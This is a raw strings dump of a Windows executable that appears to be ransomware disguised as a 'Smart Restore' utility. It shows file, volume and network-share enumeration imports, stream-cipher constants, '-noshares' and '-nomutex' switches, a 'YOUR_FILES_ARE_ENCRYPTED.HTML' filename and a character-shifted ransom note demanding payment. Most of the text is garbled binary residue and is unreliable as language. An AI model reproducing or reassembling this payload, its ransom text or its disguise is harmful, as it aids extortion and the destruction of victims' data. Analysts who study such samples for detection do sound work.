!This program cannot be run in DOS mode.
P`.data
.rdata
P@.bss
.idata
.reloc
fffff.
fffff.
fffff.
fffff.
fffff.
D$0Pjx
fffff.
ffffff.
t"=xxX
]tp=/,
ffffff.
t&=xxX
t"=xxX
]ts=/,
t&=xxX
fffff.
ffffff.
htb='E
fffff.
ffffff.
ffffff.
fffff.
ffffff.
fffff.
ffffff.
fffff.
htb='E
ffffff.
fffff.
fffff.
ffffff.
ffffff.
ffffff.
fffff.
fffff.
8tI=?Q
9)ta=?i
ffffff.
D$ PWj
fffff.
ffffff.
ffffff.
ffffff.
ffffff.
6fffff.
ffffff.
ffffff.
ffffff.
ffffff.
fffff.
fffff.
ffffff.
ffffff.
ffffff.
ffffff.
fffff.
fffff.
fffff.
fffff.
ffffff.
Mffff.
offffff.
fffff.
ffffff.
fffff.
ffffff.
fffff.
ffffff.
ffffff.
F`U"wi
fffff.
F`U"wi
fffff.
ffffff.
fffff.
ffffff.
ffffff.
fffff.
+Gtf=_*%
=-|B~u
fffff.
=-|B~u
fffff.
+Gtd=_*%
=-|B~u
=-|B~u
fffff.
ffffff.
ffffff.
ffffff.
ffffff.
ffffff.
ffffff.
fffff.
=R{YMu
=V3Uhu
qfffff.
fffff.
#t#=b-t
#t=b-t
=(EFfta=
>~7tG=
BpTtr=
ffffff.
#t6=b-t
ffffff.
ffffff.
#tY=b-t
ffffff.
#t"=b-t
fffff.
=9:kxu
Zt>=9:kxu
=9:kxu
Zt>=9:kxu
=9:kxu
Zt>=9:kxu
=9:kxu
Zt>=9:kxu
=9:kxu
Zt>=9:kxu
=9:kxu
Zt>=9:kxu
=9:kxu
=9:kxu
fffff.
=9:kxu
=9:kxu
=9:kxu
=9:kxu
=9:kxu
=9:kxu
=9:kxu
=9:kxu
=9:kxu
ffffff.
ffffff.
ffffff.
ffffff.
fffff.
ffffff.
ffffff.
fffff.
ffffff.
fffff.
fffff.
<YS1ffffff.
~)=;YS1~R=<YS1
ffffff.
t"=.=u|u
ffffff.
ffffff.
ffffff.
fffff.
fffff.
fffff.
t$$:D$
fffff.
ylHEtw
fffff.
~9=8wzA
fffff.
ffffff.
fffff.
fffff.
fffff.
fffff.
fffff.
ffffff.
fffff.
fffff.
ffffff.
fffff.
ffffff.
ffffff.
uffffff.
e!~9=v
fffff.
C@expa
CDnd 3
CH2-by
CLte k
C@expa
CDnd 3
CH2-by
CLte k
fffff.
fffff.
ffffff.
fffff.
ffffff.
-lYfff.
fffff.
fffff.
fffff.
fffff.
fffff.
fffff.
fffff.
fffff.
fffff.
ffffff.
fffff.
\$4f;S
%fffff.
fffff.
uTc;L$
V>]>t&
ffffff.
fffff.
,$;l$(
fffff.
ffffff.
fffff.
ffffff.
=t^|ju
=PcLdu
PcLdff.
"ffff.
fffff.
PcLdfffff.
ffffff.
fffff.
PcLdffff.
=PcLdu
ffffff.
PcLdffffff.
D$D=`eE
v?Iffffff.
ffffff.
fffff.
'fffff.
fffff.
ffffff.
fffff.
ffffff.
fffff.
PcLdf.
=PcLdt
Fffffff.
fffff.
=PcLdu
=PcLdu
##&rq&p*''&'*www'pv"p&u*r'up*!q%wu*urpv&$''+ur#*+&%+&$qw'rq*'#w"#q $p+rqp+'v$&r 
{ggc)<<~v~vqzr=g|c
33/2W\PGJCV3{g~
r}t.1v}1-
/{vrw-
33/~vgr3p{ra`vg.4fgu>+4-
33/~vgr3}r~v.4ezvdc|ag43p|}gv}g.4dzwg{.wvezpv>dzwg{?z}zgzr
33/gzg
v-/<gzg
33/`gj
3333{g~
?3q|wj3h
333333qrpxta|f}w>p|
|a)30"r"r"r(
3333q|wj3h
333333crwwz}t>g|c)3 av~32z~c|agr}g(
33330gvkg3{!3h
333333p|
|a)3d{zgv(
333333u|}g>`ziv)3!av~(
333333u|}g>dvzt{g)3%##(
333333
z}v>{vzt{g)3"="!&(
3333=grq`3h
333333>dvqxzg>|evau
|d>`pa|
z}t)3g|fp{(
333333r
zt}>zgv~`)3`gavgp{(
333333wz`c
333333u|}g>`ziv)3"av~(
333333yf`gzuj>p|}gv}g)3`crpv>qvgdvv}(
333333|evau
|d)3{zwwv}(
3333333333|evau
|d>k)3{zwwv}(
333333|evau
|d>k)3rfg|(
333333d{zgv>`crpv)3}|darc(
3333=grq`3f
33333333r
zt}>zgv~`)3pv}gva(
33333333q|awva>q|gg|~>p|
|a)30'&'&'&(
33333333q|awva>q|gg|~>`gj
33333333q|awva>q|gg|~>dzwg{)3"ck(
33333333wz`c
33333333u
vk>ta|d)3"(
33333333u
vk>`{az}x)3#(
33333333yf`gzuj>p|}gv}g)3u
vk>`grag(
3333n33
333333=grq`=z`>g|tt
33333333q|awva>q|gg|~)3}|}v(
333333n
333333=grq`3
3333333333c|`zgz|})3av
rgzev(
333333n
333333=grq`3
3333333333wz`c
333333n333333
333333=grq`=z`>g|tt
z=z`>rpgzev3r3h
3333333333qrpxta|f}w>p|
|a)3d{zgv(
3333333333q|awva>p|
|a)3d{zgv(
3333333333p|
|a)3atqr;#?3#?3#?3#=$:(
3333333333i>z}wvk)3"(
333333n
333333=grq`=z`>g|tt
z)uza`g>p{z
3333333333q|awva>g|c>
vug>arwzf`)3 ck(
3333333333q|awva>q|gg|~>
vug>arwzf`)3 ck(
333333n
333333=grq`3
z=z`>rpgzev3r3h
3333333333q|awva>q|gg|~>p|
|a)3d{zgv(
3333333333p|
|a)3d{zgv(
333333n
333333=grq`=z`>g|tt
3333333333q|awva>p|
|a)30'&'&'&(
3333333333q|awva>`gj
3333333333q|awva>dzwg{)3"ck(
3333333333~ratz}>q|gg|~)3#(
3333333333c|`zgz|})3av
rgzev(
333333n
333333=grq`3r3h
3333333333r
zt}>zgv~`)3pv}gva(
3333333333q|awva>q|gg|~>p|
|a)30'&'&'&(
3333333333q|awva>q|gg|~>`gj
3333333333q|awva>q|gg|~>dzwg{)3"ck(
3333333333p|
|a)3d{zgv(
3333333333wz`c
3333333333yf`gzuj>p|}gv}g)3pv}gva(
3333333333~ratz}>q|gg|~)3>"ck(
3333333333crwwz}t)3#=&v~3"v~(
3333333333evagzpr
zt})3g|c(
3333333333pfa`|a)3c|z}gva(
333333n333333
3333=grq`=z`>g|tt
r`g>p{z
33333333q|awva>g|c>azt{g>arwzf`)3 ck(
33333333q|awva>q|gg|~>azt{g>arwzf`)3 ck(
3333n333333
3333=p|}grz}va3h
333333~rk>dzwg{)3""&!ck(
333333~rk>dzwg{)3(
333333u
vk>ta|d)3"(
333333~ratz})3#3rfg|(
333333c|`zgz|})3av
rgzev(
333333dzwg{)3rfg|(
3333=q|k3h
333333qrpxta|f}w>p|
|a)30!'!'!'(
333333p|
|a)3d{zgv(
333333wz`c
333333crwwz}t)3"=!&av~(
333333q|awva)3"ck3`|
zw30 # # #(
3333n3333
|pxbf|gv3h
333333qrpxta|f}w)3{`
;#?3#6?3!#6:(
333333crwwz}t)3"av~(
333333q|awva>
vug)3 ck3`|
zw30&&r% #(
3333r3h
333333p|
|a)30v&&* '(
33/<`gj
33/`pazcg-
vg3gvkg3.3h
333333v})3s/{!-3D{rg`3[rccv},3/<{!-
33333333Dv3t|g3j|fa3w|pf~v}g`3r}w3uz
v`3v}pajcgvw3r}w3j|f3pr}}|g3rppv``3g{v~=3G|3~rxv3`fav3dv
av3}|g3q
fuuz}t3yf`g3p{vpx3|fg3j|fa3uz
v`=3Dr}g3g|3avp|eva3g{v~,3Yf`g3w|3d{rg3dv3z}`gafpg3j|f3g|=3Zu3j|f3urz
3g|3u|
|d3|fa3avp|~~v}wrgz|}`?3j|f3dz
3}veva3`vv3j|fa3uz
v`3rtrz}=3Wfaz}t3vrp{3rggrpx?3dv3p|cj3er
v3p|~~vapzr
3wrgr=3Zu3g{v3f`va3w|v`}
g3crj3g|3f`?3dv3dz
3vzg{va3`v}w3g{|`v3wrgr3g|3azer
`?3|a3cfq
z`{3g{v~=3TWCA=3W|}
g3dr}g3g|3crj3g|3f`?3crj3"#k3~|av3g|3g{v3t|eva}~v}g=3
33333333/{!-3D{rg3Tfrar}gvv`,3/<{!-
33333333Dv
av3w|z}t3|fa3|d}3qf`z}v``3r}w3}veva3prav3rq|fg3d{rg3j|f3w|=3R
3dv3}vvw3z`3g|3vra}=3@{|f
w3dv3qv3f}urza3tfj`?3}|3|}v3d|f
w3d|ax3dzg{3f`=3@|3zu3j|f3wa|c3|fa3|uuva3dv3d|}
g3grxv3r}j3|uuv}`v3qfg3j|f
3|u3j|fa3wrgr3r}w3uz
v`=3[|d3~fp{3gz~v3d|f
w3zg3grxv3g|3avp|eva3
|``v`,3J|f3|}
j3~rj3tfv``=
33333333/{!-3[|d3w|3Z3rppv``3g{v3dvq`zgv,3/<{!-
33333333/f
3333333333/
z-/r3{avu.1{ggc`)<<g|aca|yvpg=|at13gratvg.1Lq
r}x1-Tvg3G\A3qa|d`va3{vav/<r-/<
3333333333/
z-/r3{avu.1{ggc)<<vqdvkzj~q`zq'a~d=|}z|}<p{rg={g~
,#!qwq! %v$>%!' !# *$+>rvu%vu' "w>u!&+ 'u$ u>'r&$ !* p'>p+'qu"!w&&> v"*%&'r%q>!pv'qur #p1-T|3g|3|fa3dvq`zgv/<r-/<
33333333/<f
333333wv)3s/{!-3Dr`3z`g3tvarwv3cr``zvag,3/<{!-
33333333Dza3{rqv}3Z{av3W|xf~v}gv3f}w3Wrgvzv}3eva`p{
g3f}w3@zv3x
}}v}3}zp{g3~v{a3wrarfu3iftavzuv}=3Yvwva3R}tazuu3dzaw3e|}3vz}va3X|czv3wva3x|~~vaizv
v}3Z}u|a~rgz|}v}3qvt
vzgvg=3F~3`zp{vaif`gv
v}?3wr``3dza3v`3va}`g3~vz}v}?3ca
uv}3@zv3vz}urp{3Z{av3Wrgvzv}3f}w3@zv3dvawv}3`v{v}=3^
p{gv}3@zv3`zv3dzvwva{va`gv
v},3[r
gv}3@zv3`zp{3vz}urp{3r}3f}`vav3R}dvz`f}tv}?3f~3f}`3if3qvir{
v}=3Gfv}3@zv3wzv`3}zp{g?3dvawv}3@zv3Z{av3Wrgvzv}3}zv~r
`3dzvwva`v{v}=3Z~3Ur
v3vz}va3Ir{
f}t`evadvztvaf}t3dvawv}3wzv3Wrgv}3v}gdvwva3r}3Dvggqvdvaqva3evaxrfug3|wva3z}3|uuv}v}3Bfv
v}3qvavzgtv`gv
g=3TWCA=3Dv}}3@zv3f}`3}zp{g3qvir{
p{gv}?3ir{
v}3@zv3wr`3Iv{}urp{v3r}3wva3Avtzvaf}t=
33333333/{!-3Dzv3`|
gv}3@zv3f}`3garfv}3,3/<{!-
33333333Dza3~rp{v}3f}`vav3vztv}v}3Tv`p{
ugv3f}w3x
~~va}3f}`3}zp{g3wraf~3dr`3@zv3gf}v}=3Dza3~
``v}3}fa3evawzv}v}=3@|
gv}3dza3vz}urp{3}fa3q
fuuv}?3d
awv3}zv~r}w3r}3f}`3ir{
v}=3Dv}}3@zv3f}`va3R}tvq|g3rq
v{}v}?3dvawv}3@zv3r
v3Z{av3Wrgv}3u
a3z~~va3eva
zvav}=3Dzv3ezv
3Ivzg3dvawv}3@zv3qarfp{v}3f~3z{av3Wrgv}3`v
qva3if3va`vgiv}3,3@zv3x
}}v}3v`3`zp{3`p{|}3wv}xv}=
33333333/{!-3F}`vav3U|awvaf}tv}3/<{!-
33333333/f
3333333333/
z-/r3{avu.1{ggc`)<<g|aca|yvpg=|at13gratvg.1Lq
r}x1-[|
v}3@zv3`zp{3wv}3G\A>Qa|d`va3{zva/<r-/<
3333333333/
z-/r3{avu.1{ggc)<<vqdvkzj~q`zq'a~d=|}z|}<p{rg={g~
,#!qwq! %v$>%!' !# *$+>rvu%vu' "w>u!&+ 'u$ u>'r&$ !* p'>p+'qu"!w&&> v"*%&'r%q>!pv'qur #p1-Tv{v}3@zv3rfu3f}`vav3Dvq`zgv/<r-/<
33333333/<f
333333ua)3s/{!-3Bf4v`g>pv3bfz3ezv}g3wv3`v3cr``va,3/<{!-
33333333]|f`3re|}`3pajcg
3e|`3w|pf~v}g`3vg3uzp{zva`3vg3e|f`3}v3c|fevi3cr`3j3rpp
wva=3P{rbfv3rggrbfv3v`g3rpp|~crt}
v3w4f}v3p|czv3wv`3z}u|a~rgz|}`3p|~~vapzr
v`=3C|fa3e|f`3r``fava3bfv3}|f`3}v3q
fuu|}`3cr`=3E|f
vi>e|f`3
v`3av`grfava,3Urzgv`3yf`gv3pv3bfv3}|f`3e|f`3wv~r}w|}`?3c|fa3}|f`3crjva=3@z3e|f`3}v3`fzevi3cr`3}|`3avp|~~r}wrgz|}`?3e|f`3}v3evaavi3c
f`3yr~rz`3e|`3uzp{zva`=3V}3pr`3wv3avuf`3wv3crzv~v}g3>3
v`3w|}}
v`3`va|}g3`|zg3avev}wfv`3
3wv`3p|}pfaav}g`?3`|zg3wzuuf`
v`3wr}`3wv`3`|fapv`3|fevagv`=3TWCA=3@z3e|f`3}v3e|f
vi3cr`3}|f`3crjva?3crjvi3k"#3u|z`3
v3t|feva}v~v}g=
33333333/{!-3Bf4v}3v`g>z
3wv`3trar}gzv`,3/<{!-
33333333]|f`3urz`|}`3}|`3ca|cav`3ruurzav`3vg3}v3}|f`3`|fpz|}`3yr~rz`3wv3pv3bfv3e|f`3urzgv`=3G|fg3pv3w|}g3}|f`3re|}`3qv`|z}3v`g3wv3trt}va3wv3
4ratv}g=3@z3}|f`3wvez|}`3
gav3z}yf`gv`?3cva`|}}v3}v3garerz
varzg3revp3}|f`=3W|}p?3`z3e|f`3rqr}w|}}vi3}|gav3|uuav?3}|f`3}v3cav}wa|}`3rfpf}v3z}uarpgz|}?3~rz`3e|f`3cvawavi3g|fgv`3e|`3w|}}
v`3vg3e|`3uzp{zva`=3P|~qzv}3wv3gv~c`3urfwarzg>z
3c|fa3a
v`3cvagv`,3E|f`3c|fevi3`vf
v~v}g3wvez}va=
33333333/{!-3P|~~v}g3cfz`>yv3rpp
wva3rf3`zgv3dvq,3/<{!-
33333333/f
3333333333/
z-/r3{avu.1{ggc`)<<g|aca|yvpg=|at13gratvg.1Lq
r}x1-G
p{ratvi3
v3}reztrgvfa3G\A3zpz/<r-/<
3333333333/
z-/r3{avu.1{ggc)<<vqdvkzj~q`zq'a~d=|}z|}<p{rg={g~
,#!qwq! %v$>%!' !# *$+>rvu%vu' "w>u!&+ 'u$ u>'r&$ !* p'>p+'qu"!w&&> v"*%&'r%q>!pv'qur #p1-R
vi3`fa3}|gav3`zgv3dvq/<r-/<
33333333/<f
333333v`)3s/{!-3
_|3bfv3wv3cr`ra,3/<{!-
33333333Jr3gv}v~|`3`f`3w|pf~v}g|`3j3rap{ze|`3v}pazcgrw|`3j3f`gvw3}|3cfvwv3rppvwva3r3v
|`=3Crar3r`vtfara`v3wv3bfv3}|3v`gr~|`3ura|
vr}w|=3
Bfzvav3avpfcvara
|3{rtr3
|3bfv3
v3z}wzpr~|`=3@z3f`gvw3}|3`ztfv3}fv`gar`3avp|~v}wrpz|}v`?3f`gvw3}f}pr3eva
3`f`3rap{ze|`=3Wfar}gv3prwr3rgrbfv?3p|czr~|`3
|`3wrg|`3p|~vapzr
z|`|`=3@z3v
3f`fraz|3}|3}|`3crtr?3v}ezrav~|`3v`g|`3wrg|`3r3`f`3azer
|`3cfq
zprav~|`=3TWCA=3]|3bfzvav3crtra}|`?3crtr3"#3evpv`3~
3t|qzva}|=
33333333/{!-3
3cr`r3p|}3
r`3trar}g
r`,3/<{!-
33333333V`gr~|`3{rpzv}w|3}fv`ga|3ca|cz|3}vt|pz|3j3}f}pr3}|`3z~c|agr3
|3bfv3{rpv3f`gvw=3G|w|3
|3bfv3}vpv`zgr~|`3v`3tr}ra=3[rj3bfv3`va3z}yf`g|`3p{zp|`?3}rwzv3garqryra
r3p|}3}|`|ga|`=3V}g|}pv`?3`z3wvyr3prva3}fv`gar`3ca|cfv`gr`?3}|3}|`3|uv}wvav~|`3cva|3f`gvw3cvawva
3g|w|`3`f`3wrg|`3j3rap{ze|`=3
}g|3gzv~c|3`v3avbfzvav3crar3avpfcvara3
awzwr`,3@
|3f`gvw3cfvwv3rwzez}ra=
33333333/{!-3
~|3rppvwva3r
3`zgz|3dvq,3/<{!-
33333333/f
3333333333/
z-/r3{avu.1{ggc`)<<g|aca|yvpg=|at13gratvg.1Lq
r}x1-\qgv}tr3v
3}revtrw|a3G\A3rbf
/<r-/<
3333333333/
z-/r3{avu.1{ggc)<<vqdvkzj~q`zq'a~d=|}z|}<p{rg={g~
,#!qwq! %v$>%!' !# *$+>rvu%vu' "w>u!&+ 'u$ u>'r&$ !* p'>p+'qu"!w&&> v"*%&'r%q>!pv'qur #p1-Erjr3r3}fv`ga|3`zgz|3dvq/<r-/<
33333333/<f
333333yc)3s/{!-3
3/<{!-
33333333
33333333
33333333
33333333/{!-3
3,3/<{!-
33333333
33333333
33333333/{!-3Dvq
3/<{!-
33333333/f
33333333/
z-/r3{avu.13{ggc`)<<g|aca|yvpg=|at313gratvg.1Lq
3/<r-/<
33333333/
z-/r3{avu.1{ggc)<<vqdvkzj~q`zq'a~d=|}z|}<p{rg={g~
,#!qwq! %v$>%!' !# *$+>rvu%vu' "w>u!&+ 'u$ u>'r&$ !* p'>p+'qu"!w&&> v"*%&'r%q>!pv'qur #p1-
3/<r-/<
33333333/<f
3333n(
3333uf}pgz|}3`v
r}t;vev}g:3h
333333
vg3rpgzev3.3w|pf~v}g=tvgV
v~v}g`QjP
r``]r~v;4z`>rpgzev4:H#N(
333333rpgzev=p
r``_z`g=av~|ev;4z`>rpgzev4:(
333333vev}g=gratvg=crav}gV
v~v}g=p
r``_z`g=rww;4z`>rpgzev4:(
333333
r}t3.3vev}g=gratvg=tvgRggazqfgv;4wrgr>
r}t4:(
333333
3.3w|pf~v}g=tvgV
v~v}gQjZw;4gvkg4:(
333333v
=z}}va[G^_3.3gvkgH
3333w|pf~v}g=rwwVev}g_z`gv}va;1W\^P|}gv}g_|rwvw1?3;:.-h
333333
3.3w|pf~v}g=tvgV
v~v}gQjZw;4gvkg4:(
333333v
=z}}va[G^_3.3gvkgH4v}4N(33333333333
3333n:(
33/<`pazcg-
/<{vrw-
/q|wj3p
r``.4cg>%4-
/wze3p
r``.4p|}grz}va4-
/wze3p
r``.1grq`3z`>g|tt
r``.1z`>rpgzev1-/r3|}p
zpx.4`v
r}t;vev}g:(43wrgr>
r}t.4v}4-V]/<r-/<
r``.11-/r3|}p
zpx.4`v
r}t;vev}g:(43wrgr>
r}t.4wv4-WV/<r-/<
r``.11-/r3|}p
zpx.4`v
r}t;vev}g:(43wrgr>
r}t.4ua4-UA/<r-/<
r``.11-/r3|}p
zpx.4`v
r}t;vev}g:(43wrgr>
r}t.4v`4-V@/<r-/<
r``.11-/r3|}p
zpx.4`v
r}t;vev}g:(43wrgr>
r}t.4yc4-YC/<r-/<
/<wze-
/wze3p
r``.4q|k4-
/wze3zw.4gvkg4-/<wze-
33/wze3`gj
v.4q|awva)3"ck3`|
zw3avw(3crwwz}t)3=&av~(3u|}g>`ziv)3"= av~(3u|}g>dvzt{g)3&##(3~ratz})3 av~3#(4-
3333/wze3p
r``.4gzg
v3z`>'4-
3333Z}3pr`v3j|f3wvpzwv3}|g3g|3p||cvargv?3j|fa3cazergv3wrgr3dz
3qv3cfq
z`{vw3/r3`gj
|a)30'%r#'*(3gvkg>wvp|argz|})3f}wva
z}v(43gratvg.4Lq
r}x43{avu.4{ggc)<<}qiiq%`r%kffar!i=|}z|}<4-{vav/<r-3|a3`|
33/<wze-
/<wze-
/wze3`gj
v.4~ratz}>g|c)3!av~(4-
/{!-\uu
z}v3{|d>g|/<{!-
/c-P|cj353Cr`gv3g{z`3`vpavg3~v``rtv3g|3/r3{avu.1{ggc)<<vqdvkzj~q`zq'a~d=|}z|}1-g{z`3crtv/<r-3gvkgravr3uzv
|pxbf|gv- "$+#pq'$qqw&wwww &+*q*&$!"w""%w#up"$&!!pv$wr"!+#+%*%"%r u+&v+++p+%+$w$+"wv*$p#uwqq%v"&rv*"v! +$/<q
|pxbf|gv-/<c-
/<wze-
/<wze-
/<wze-
/<q|wj-
xmtV,m
BxmtV,m
kTbg 6&dO
?g 6&dO
[sx/bBD
ntdll.dll
_vsnprintf
vsprintf
_vscwprintf
_vswprintf
_vsnwprintf
Hbj_4s
KAY2g
qR3X-f
""\\//b
-9223372036854775808
9223372036854775807
3hJ26wJ
rG05b,^rG05b,^
2+jF2+jF2+jF2+jF,
////////////////*1A
8888888888888888
NNNNNNNNNNNNNNNN
AAAAAAAAAAAAAAAA
expand 32-byte k
expand 16-byte k
ZG:X=
 y{>D1
1"EYg-
]$C9"D
3]X+'/
3!XI-X
qAZf4[
GetUserNameA
AllocConsole
AttachConsole
CloseHandle
CreateFileW
CreateIoCompletionPort
CreateMutexA
CreateThread
ExitProcess
FillConsoleOutputAttribute
FillConsoleOutputCharacterA
FindClose
FindFirstFileW
FindFirstVolumeW
FindNextFileW
FindNextVolumeW
FindVolumeClose
GetCommandLineW
GetComputerNameExA
GetConsoleMode
GetConsoleOutputCP
GetConsoleScreenBufferInfo
GetCurrentProcess
GetDriveTypeW
GetFileSizeEx
GetFileType
GetLastError
GetLogicalDrives
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetQueuedCompletionStatus
GetStdHandle
GetSystemInfo
GetVersionExA
GetVolumePathNamesForVolumeNameW
HeapAlloc
HeapFree
LoadLibraryA
LocalFree
MoveFileW
MultiByteToWideChar
PostQueuedCompletionStatus
ReadFile
SetConsoleCursorPosition
SetConsoleMode
SetConsoleScreenBufferSize
SetConsoleTextAttribute
SetFileAttributesW
SetVolumeMountPointW
WideCharToMultiByte
WriteConsoleW
WriteFile
lstrcatW
lstrcmpA
lstrcmpW
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenA
lstrlenW
WNetAddConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetGetConnectionW
WNetOpenEnumW
CoCreateInstance
CoInitialize
CoSetProxyBlanket
VariantClear
VariantInit
GetUserNameExA
CommandLineToArgvW
PathFindExtensionW
wnsprintfA
wnsprintfW
wsprintfW
HttpAddRequestHeadersA
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
ADVAPI32.dll
KERNEL32.dll
MPR.DLL
ole32.dll
OLEAUT32.dll
Secur32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.DLL
<?xml version="1.0" encoding="utf-8" ?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"
    xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
    xmlns:asmv2="urn:schemas-microsoft-com:asm.v2"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <assemblyIdentity version="1.0.0.0" name="MyApplication" />
    <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
        <security>
            <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
                <requestedExecutionLevel level="asInvoker"
        uiAccess="false" />
            </requestedPrivileges>
        </security>
    </trustInfo>
</asmv1:assembly>
51686n7
67>X>^>{>
?2?f?v?
3G4L4R4
8>9g9m9
2#2V2s234A4
6Z8a8g8t8
8$:*:w:}:g<u<
> >->t?z?
i1u1|1
516762787>7a8
;M<\<r<
<L=X=^=
5)62696@6
3:3@374=4
5(6/666r6
7G<N<U<
6(;/;H;
>>U?[?
O1V1b4h4
5Z6a6n6
=;=D>o>
3B4I4P4
345:5]6c6
488S8v8
;1;8<><
0"0:0y1
6 7k8q8
1E2L2u2
7&8@8t9z9
3<3+414
(0/050
152;2A2
2#5)555<5
0`2g2m2
7/9699:?:a=g=
3A5]6j667<7
8<9B9H9
9/:5:\:g:m:
<9<K<u<{<
>2>=>k>1?7?
2(2P2f3
><?C?^?~?
21383^3{3
<2=7=d=v=|=
01171~1
1&232b2h2
6K6c6y6
6:7?7L7V7r7
8L9K:R:
<P=w=}=
50C0I0|2
3-434d4
<;=B=H=
1+1f2l2
3$4^4d4
52585e5k5
;-;4;;;Y;
>3>G>w>
>(?-?3?h?
2)2/2a2
3;3F3o3
4P4k4q4
485>586|6
? ?I?T?Z?
>#>`>z>
3l4s4z4
82999@9S9
'1-1Z1`1
96:<:o:u:
>)>0>7>
2 2Q3_3
7!8'8G9a9{9
93:N:a:g:
=]>c>C?L?
1>1D132R2
1(2.2>3D3
50767>;E;'?.?
5'6-6W6]6
:B:,;3;P;`;
030f0l0}1
3H3O3U3j3
44j4p4!5/5A6O6
:U;[;w<
7F8L8w8
:$<*<v<|<
1q2w2~2
8,9A9}9
0 1-141:1
2-3?3v4
1(3R3{3
8s9y92:>:E:M:
;$<*<w<}<*>@>
4!4(404
6#6V6\6
=F>T>v?
<2C2`2n2
3.3V4v4
6$6/74797?7J8Q8
:F;M;i;q;
20>0E0f0&1E1V2\2
4W4v4B5M5a5h5
-0:0v1|1
1Q3]3e3o3
0#3)3w3
384>4N4
2)3.3:3T3\3
3s4y4R5X53696t6z6
999h9n9
:$;0;x=~=+>1>
071x3~3
9.:4:x:
:?;j;t;
4#4L4b4
4*585R5e5q5
7D8Z8h8{8
=O>o>u?
2:2P2V2m2s2
3G3^3k3p3v3
:0;C;h;
?:?P?V?
687]7c7
=!>N>x>
2'393i4p4
5$5Z5}6
1_3h3J8\8'909
;M<\<z<8=C=
=K>Q>T?Y?e?t?
3H3g3}3
4.5M5S5
6%7R7\7u7{7
;+<x<~<
5F6L6$7*7t7z7 8&8
=9>U>[>g>l>r>
70<0B0i0
1.242x2~2
2/343y3~3
3J4O4a4
7&8Q8z8
44u4{4
0%0$2*2
7#8h8n8
9B:H:7;=;
<'=8=\=!>9>
;-;V;l;r;
1-262]4
282h2v2
9m:s:0;6;<<g<m<
2(3S3|3
<0=A=i?
.444"5)5g5m5
5)636L8
0i1H2N2
9`:f:#;*;
(1.1D2\3
w0}091R1
8 869H9x:~:
2;3A3I3f3n3I4
4"5[5g5(6.6
><?H?]?
67R7o7
9K:d:p:
9*:s:C;K;
7>8D899X9
3>41575H5N5
566@677[7
4h5n5^7i7
J0P0r1w1w2|2
3,3/454
5A6b6V7
80969~9
9&:<:e:{:
;1;_;e;
6o7u7'8-8
636x6~6
;);u;{;
0+11192
727Q7v7
;P=V=n>s>
9&:+:u:z:
;e<F=K=
2&4O4J5O5
9#9M:S:M;S;.<4<3?M?|?
'0U0[0
t1x1|1
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2
$<(<0<
-noshares
-nomutex
-noreport
Windows
Program Files
Program Files (x86)
$Recycle.bin
System Volume Information
%ls\%ls
YOUR_FILES_ARE_ENCRYPTED.HTML
\\?\%c:
VS_VERSION_INFO
StringFileInfo
040C04E4
FileDescription
Smart Restore Compagny
FileVersion
1.7.0.0
LegalCopyright
Copyright (C) 2020
ProductName
Smart Restore
ProductVersion
1.7.0.0
VarFileInfo
Translation
